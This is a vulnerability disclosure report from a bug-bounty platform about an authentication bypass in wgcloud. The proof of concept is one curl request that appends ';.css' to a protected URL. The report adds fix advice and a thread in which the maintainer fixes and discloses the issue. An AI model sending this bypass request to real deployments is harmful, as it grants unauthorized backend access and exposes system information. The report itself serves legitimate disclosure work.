Auth bypass via improper use of getRequestURL() in tianshiyeben/wgcloud

Valid

Reported on

Mar 29th 2022


Description

wgcloud uses getRequestURL() improperly; an attacker could craft a URL that bypasses wgcloud's auth.

Normally, when browsing http://[ip]:9999/wgcloud/dash/main with no auth, you are redirected to /wgcloud/login/toLogin, but this vuln bypasses that redirect.

Proof of Concept

curl 'http://[ip]:9999/wgcloud/dash/main;.css'

HTTP/1.1 200 
Set-Cookie: JSESSIONID=00659E0197260C8DF3988AC21AA987CC; Path=/wgcloud; HttpOnly
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Tue, 29 Mar 2022 14:36:24 GMT

No auth is needed to get into the backend.

Impact

This vulnerability allows abuse of backend functions with no auth required. An attacker could retrieve sensitive information about the system via this vuln.

Occurrences

indexOf is not recommended; the match should be more exact. Use @WebFilter(urlPatterns) instead, or configure the static resource paths in application.properties.

Don't use getRequestURL(); use getServletPath() instead.

indexOf is not recommended; the match should be more exact. Use @WebFilter(urlPatterns) instead, or configure the static resource paths in application.properties.
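As an added illustration (not code from wgcloud or from the reporter), the filter's static-resource whitelist check written both ways in Java: the indexOf-over-getRequestURL() pattern the report describes, and the servlet-path form the notes above recommend. The class and method names are hypothetical, and the hardened variant assumes the container has already stripped path parameters (the ";..." segment) from getServletPath().

```java
// Added example, not wgcloud's own code. Assumption: the servlet container removes
// path parameters and the query string before returning getServletPath(), so the
// PoC request "/dash/main;.css" reaches the hardened check as "/dash/main".
public class StaticResourceCheck {
    private static final String[] STATIC_SUFFIXES = {".css", ".js", ".png", ".ico"};

    // Vulnerable: substring search over the full URL. getRequestURL() keeps the
    // path-parameter segment, so "/dash/main;.css" contains ".css" and skips auth.
    static boolean isStaticVulnerable(String requestUrl) {
        for (String suffix : STATIC_SUFFIXES) {
            if (requestUrl.indexOf(suffix) != -1) {
                return true;
            }
        }
        return false;
    }

    // Hardened: look only at the last segment of the servlet path and require the
    // suffix at its end. The ';' and '?' cuts are defensive, for callers passing a raw path.
    static boolean isStaticHardened(String servletPath) {
        String path = servletPath;
        for (char stop : new char[] {';', '?'}) {
            int cut = path.indexOf(stop);
            if (cut != -1) {
                path = path.substring(0, cut);
            }
        }
        String last = path.substring(path.lastIndexOf('/') + 1);
        for (String suffix : STATIC_SUFFIXES) {
            if (last.length() > suffix.length() && last.endsWith(suffix)) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        // Constructed samples: the PoC request, a genuine stylesheet, and a protected page.
        String[] urls = {
            "http://host:9999/wgcloud/dash/main;.css",
            "http://host:9999/wgcloud/static/site.css",
            "http://host:9999/wgcloud/dash/main"
        };
        for (String url : urls) {
            System.out.printf("%-42s vulnerable=%-5b hardened=%b%n",
                    url, isStaticVulnerable(url), isStaticHardened(url));
        }
    }
}
```

Only the genuine stylesheet passes the hardened check; the PoC URL is flagged as static by the vulnerable check alone.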

We are processing your report and will contact the tianshiyeben/wgcloud team within 24 hours. 2 months ago
hi-unc1e modified the report
2 months ago
hi-unc1e modified the report
2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the tianshiyeben/wgcloud team and are waiting to hear back 2 months ago
tianshiyeben/wgcloud maintainer has acknowledged this report 2 months ago
tianshiyeben
2 months ago

Maintainer


Thank you very much for your suggestions. I already know how to fix it and have started to make some updates

hi-unc1e
a month ago

Researcher


OK, can you update the status of this issue? So that a vulnerability serial-number could be assigned, and we both can get some bonus.

tianshiyeben
a month ago

Maintainer


OK, give me a little more time. I haven't finished it yet. I'll update this status at that time

tianshiyeben
a month ago

Maintainer


Hello, excuse me, I now change the status to valid. Will this bug not be disclosed?

hi-unc1e
a month ago

Researcher


It seems that @tianshiyeben doesn't want to disclose this vuln. I am not quite sure about it; let's ask the admin. Hi @admin, what should we do if we want to keep this vuln private?

tianshiyeben
a month ago

Maintainer


ok, I still have some work to finish now. I want to wait some time.

hi-unc1e
a month ago

Researcher


Okay, understood

tianshiyeben
a month ago

Maintainer


thank you

Jamie Slome
a month ago

Admin


You can go ahead and mark the report as valid. This will NOT make the report public. Only once you have marked it as fixed, will the report go public 👍

In short, if you tell us a report is fixed, it will be made public.

tianshiyeben validated this vulnerability a month ago

ok

hi-unc1e has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the tianshiyeben/wgcloud team. We will try again in 7 days. a month ago
We have sent a second fix follow up to the tianshiyeben/wgcloud team. We will try again in 10 days. a month ago
tianshiyeben
a month ago

Maintainer


Thank you for your feedback and suggestions. I have fixed this bug and released it

tianshiyeben
a month ago

Maintainer


Thank you for your feedback and suggestions. I have fixed this bug and released it

Thank you again

tianshiyeben
a month ago

Maintainer


I found that I can't mark it as repaired. There is no response after clicking the button. Can the administrator help me? @admin

tianshiyeben confirmed that a fix has been merged on 91f7cb a month ago
The fix bounty has been dropped
AuthRestFilter.java#L49 has been validated
AuthRestFilter.java#L45-L46 has been validated
AuthRestFilter.java#L56 has been validated
tianshiyeben
a month ago

Maintainer


ok I've marked it as fixed @admin
